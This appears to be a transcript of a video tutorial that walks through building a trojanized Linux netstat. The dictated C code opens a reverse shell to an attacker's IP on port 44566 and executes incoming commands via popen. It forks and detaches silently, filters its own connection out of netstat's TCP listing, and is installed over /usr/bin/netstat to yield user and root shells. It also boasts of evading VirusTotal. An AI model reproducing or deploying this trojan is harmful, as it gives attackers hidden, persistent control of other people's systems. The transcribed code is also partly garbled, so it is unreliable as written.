Hello everyone, today I'm going to be creating a Trojan version of netstat. So what is netstat? Netstat is a program used to list all the active connections on a computer. So why are we using netstat? Well, A, we can manipulate the output of netstat. B, standard users and root users are able to access it, allowing us to gain a variety of different access levels if we have a shell. So any prerequisites to this? We will need to actually replace the netstat command in the user bin directory, so we will need root permission. And then I just want to put a disclaimer so my channel doesn't get terminated. The content discussed is solely for use in authorized penetration engagements where persistence is permitted. So what are the goals of this project? I want to modify netstat to initiate a reverse shell in the background to our server upon user activation. I also want to conceal the process from appearing in the netstat results. So if you can see in my image with the netstat-t, that's for TCP connections. I want to hide it from there. And then I want to actually replace the existing binary so that when they type netstat, it actually runs our Trojan. So let's go ahead and get to the coding. So the first thing we're going to do is we're going to actually download the netstat source. So this guy, dcantrell, he forked net tools and then just kind of stripped all the tools from it but netstat. So we're just going to clone this repository. And we're going to go cd netstat. And you can see there's an autogen file in here, so let's set that up. We're going to do autogen. And then that's going to generate our configure file, so now we can just launch that. Configure, this is going to start making the make file. And then finally we can type make and cd src. And you can see that that built this netstat command right here. So we're good to go. Our setup's complete. So now we just need to edit this netstat.c file to put our Trojan in it. So let's do vim netstat.c. I'm going to close out of this. We don't need this anymore. So let's go down a bit past this big old comment, and we're going to put some includes in here. So we're going to do hashtag include sys types.h. I'm going to copy this line and just paste it. Whoops. There we go. Then we also need sys sockets or socket.h. And then we also need net inet in.h. and artpa inet-h. These are just our socket includes. So now let's keep going down, and we're going to define some constants. So we're going to do define port. We're going to do 44566. You just want to make sure not to use a registered port, because if you run it on a port between 0 and I think 1000, it's going to require root access. So port to host backdoor. Let's define our server IP. So this is going to be our attacking IP, because this is going to be a reverse shell. Say .0.87. So change this to what you want. Let's do our buffer size. Whoops. We're going to make that 1024. So this is our byte size to capture over a socket. So whenever we're reading a socket, this is how many bytes we're going to read. And then we're going to do define response underscore size. And this one's going to be 4096. And this is going to be our bytes to send over a socket. So now that we have a couple of constants defined, now let's make our backdoor function. So I'm going to make the declaration for it. So I'm going to say int backdoor. It's going to be a void function. Back. So now let's actually define it. We're going to do int backdoor void. Now we're just going to define our socket. So we're going to do int sockfd for file descriptor struct. This is actually our struct for the socket. We're going to call this server header. Then we're going to define our char buffer here. So buffer, and this is going to be that buffer size that we defined up top. We're going to duplicate this. Fix my mistake here. We're going to call this response. And then response size. It's a file. And then there's a size variable. Okay, so now let's actually create our socket. So we'll do sockfd equals socket af underscore inet. Do sock stream. And we're going to say 0. So this is just creating a socket, which we're going to use to actually connect to an IP. So we're going to do if sock fd less than 0. Then we're going to comment this out for now, but just in case we're getting errors, we can uncomment this. I'm going to say failed to create socket. Right? Because we don't actually want that to print out if we're doing a real engagement. And then we're just going to say return 1 if it failed. Now we're going to build the socket families. We're going to do server adder dot syn underscore family equal af underscore inet. I'm pretty sure that just tells it to use TCP, and then we're going to do server underscore adder dot syn port htons port. That's just going to cast that port value that we defined to the correct type. We're going to do server adder syn adder dot s underscore adder equals inet adder server underscore IP. So this is just telling it what IP address we want to actually connect to. So now we're actually going to connect to the IP. So we can do if connect sock fd, then we're going to do struct sock adder star. Here then we're going to do %server adder, then size of server adder less than less than 0. This is just calling socket connect, and it's passing the socket file descriptor we made up here, and it's passing the server adder struct that we defined up here. So it's just saying, hey, connect using this file descriptor using these settings we have set up. And then once again, we're just going to go down here and we're going to say p error. Just in case this fails, we're going to say failed to connect to the remote address. Then we're going to just do return 1. If it failed, we don't want it. So now we connected at this point. Now we need to start sending and receiving data. So what we're going to do is we're just going to say while 1, which just means while true. We're going to do char prompt. And then we're going to make an array. This is going to be the prompt to send over. So we're going to do like a little shell, right? And we're going to do send. We're going to use that socket parameter, sockfd, prompt, and then we want to pass the length of the prompt so it knows how much to send. And then we're going to say 0. So that's just going to send this prompt over to the user. So now let's write the code to receive the data. We're going to do memset, set buffer, and then we're going to do 0. Then the size of it is going to be buffer size. Now what we're going to do is we're going to do bytes received. We're going to do receive sockfd. We want to put it in the buffer we created, and the buffer size is the length. Then we're just going to pass 0. So this is setting up that buffer variable, and then this is actually going to take the information received from the socket and put it into the buffer variable. So if we do if bytes received is less than or equal to 0, we're just gonna break. We don't really care. Otherwise, we want to execute the command. So let's do buffer. I realized I had a typo in a couple of my bytes received, so I've changed those real quick. So let's keep going. Now what we're going to do is we are going to null terminate this string, which is required for pop open. So we're just going to do that. So now we're going to use the pop in command to actually run the buffer that was passed. So buffer is the command passed, and then we're going to pass R for read. So read the results. So we're going to say if fp, if the results are equal to null, and they probably didn't issue a write command, we're just going to say continue. Otherwise, we're going to do while fgets response size of response -1. We're going to do fp is not equal null. So what this is saying is we're basically going to iterate over the fp results, so the results of our command line by line. And then what we're going to do is we're going to send it. So we're going to do sockfd response, and then the length of the response, so response. And then that 0 variable, or that 0 value. So then once that's done, we just want to do pclose fp to close that pop open session. And then right down here, we want to add two things. We want to just say close suck fd, properly close the socket, and we're just going to return 0 here. So let's go ahead and let's run make to make sure this is all right so far. So let's try make. Oh, I forgot a semicolon. Like always. And then make. Let's see. Oh, I think yeah, misspelled that. It's fgets, I think. Yeah, fgets. Alright, so that compiled. I'm gonna just remove it just to double check. Yeah, okay, so it compiled. We didn't actually add the code anywhere, we just wrote the function, but it worked. So now what I'm gonna do is I'm gonna add this backdoor function to main. So every C program has a main function. This is the first thing to get executed, so we're just gonna scroll down here. And let's just add it right here. So we're gonna say backdoor. We're just gonna call it. So I'm going to go ahead and make the program that actually compiled it right. I'm going to set up my netcat listener over here. So I'm going to press enter. That's listening on the port I've configured. I'm just going to move this over right here so we can see it. And let's execute netstat-t. So you can see it holds, right? And over here we have a shell, so we can do ID. You can see our UID is 1000. We're the Drew user. Let's do host name, Ubuntu desktop, right? That's the same as this one. So let's go ahead and let's cancel out of this. And you can see once we cancel, it prints out the results. Well, that's not what we want, right? We want it to do, so when they run netstat, it launches it in the background. So let's go ahead and work on that. So let's do vim netstat.c again. Let's go back to the main function. So main, let's scroll down, and we're going to delete this for now. We're going to go to the bottom. We're going to go to the absolute bottom here. So what we're going to do is we're going to define a PID. We're going to do PID underscore T, PID, and then SID. And then we're going to do PID equals fork. So basically what we're going to do is we're going to duplicate the current process. So if the PID is less than 0, that means there was a failure forking the process. So we're just going to say return 1. Then we're going to say if PID is greater than 0. So if the current code is the current main process, not the fork, we just want to exit. We're done. We don't care. Otherwise, if we're the child fork, then we want to create a new SID for the child process. We're going to do SID equals set SID. So it's running independently from the previous process. And then again, if SID is less than 0, then there's probably an error here. We're going to do return 1. Now we're going to close file descriptor so nothing gets printed out to the user running this command. So we're going to do stdin file no. That's closing the sdin. Now we're going to close sdout for just standard output. File no. And then we're going to close sderror. Then finally, we're going to call the backdoor process. So we're just going to say backdoor. So to elaborate again, we're just simply duplicating the process. If it's the main process, we're quitting. Otherwise, if it's the secondary process, we're closing all the output so it doesn't print anything to the screen, and we're launching the backdoor. So let's save this. Whoops, let's save this. Let's do make. Looks like it compiled. So now let's go back here to my VM. Let's create a shell, right? We're listening again. And then what I'm going to do is I'm going to do /netstat. So you can see it finishes, right? The process is done, and we still have a shell. So there's nothing printing out to the user. We can use this shell, normally, and we still have the backdoor access. So let's close out of that. Actually, I'm going to show you one more thing real quick. So we're going to do netstat-t to show TCP connections. I'm going to start the listener again. And we are going to now run it again. And you can see that this right here is the connection to this computer. So it's showing that we're connecting to .87 over port 44566. So let's go ahead and let's hide this from the output. So we're going to do vim netstat.c. And to find this, basically what I did was I just searched for TCP, and I just kind of stepped through the results of this search. And eventually I found this. So this TCP info function, so you can see it says info guts S6, and then it says path procnet TCP. So procnet is a directory, and it offers a snapshot of various aspects of the system's network configuration and performance. So it's reading that procnet directory for any information, and then it's passing each line to this TCP do1 function. So if we actually scroll up, this TCP do1 function is right here. It's a void function, so it doesn't return anything, but if you scroll to the very bottom, you can see it prints this line, and it says it prints protocol. I don't know what these two are on the top of my head. Netmax, you can see local address, netmax, and then remote address. So maybe this is the line printing out the TCP connections. So what if we just go right here, just said, well, if the remote address is our server IP address, don't print it out. Char malware rem adder. So we're going to define a string here with 50 bytes, and we're going to do sprintf malware rem adder %s %b, and then we're going to do server underscore IP and then port. So what this is doing is we are putting the server IP, which is going to go right here, and then we're going to do colon, and then port is going to be this malware rem address. So it's going to store the server colon port in malware rem address. Because if we just do netstat, I actually don't have netstat installed, so I need to go projects. Because if we do netstat-t, you can see it appends that colon to it, right? So let's go ahead, and now let's just do if string compare. So if the remote address is equal to the malware address, I'm going to say equals 0, we're just going to return. It's a void function, so we don't need to specify any return. Let's back out of this. So we're going to save it. Let's do make. It compiled. And let's do netstat-t. You can see that our source address is hidden. We still have that malware section, and we are still able to access the system. So now let's run it as root. So let's just do sudo bang bang to run the previous line as root. And do who am I? Oh, whoops, maybe that was, let me do that again. There we go. And you can see we are root. So now let's actually throw this netstat binary we made into Virustotal to see what it says. So you can see that Virustotal actually flags it as non-malicious. So even if in the dynamic analysis it doesn't detect it as malware, it does say that it does do host interaction, it can do some communication, it does some receiving and sending data on sockets, but it's not enough to actually flag it as malicious. So now let's go ahead and replace the current netstat binary with the new one we just created. I'm going to use the locate command to find the original netstat. So I'm going to say locate netstat grep bin, and you can see it's in user bin netstat. So I'm going to replace that. So I'm going to say move netstat to user bin netstat. Yes. Let's do sudo. So move that binary, right? We need that root access. So now I'm going to launch netstat. Now that we replaced the binary, you can see we're not in that projects directory, and it created that shell. So now let's do that as root. So I'm going to cancel out of that, launch a new one. Then I'm going to say sudo netstat. And you can see we also gained a shell with root. So I hope you guys enjoyed this video. This was a pretty fun project to make. I left the GitHub repository I made in the description for this. Has all the code I made in the video with some comments as well. And YouTube, please don't terminate my channel. I'm begging you, there's plenty of legit uses for this. If you're an authorized pen tester on a network and you're tasked to act as an APT, you know, this is maybe one of the things you might consider doing. So I hope you guys enjoyed, and I'll see you guys in the next video.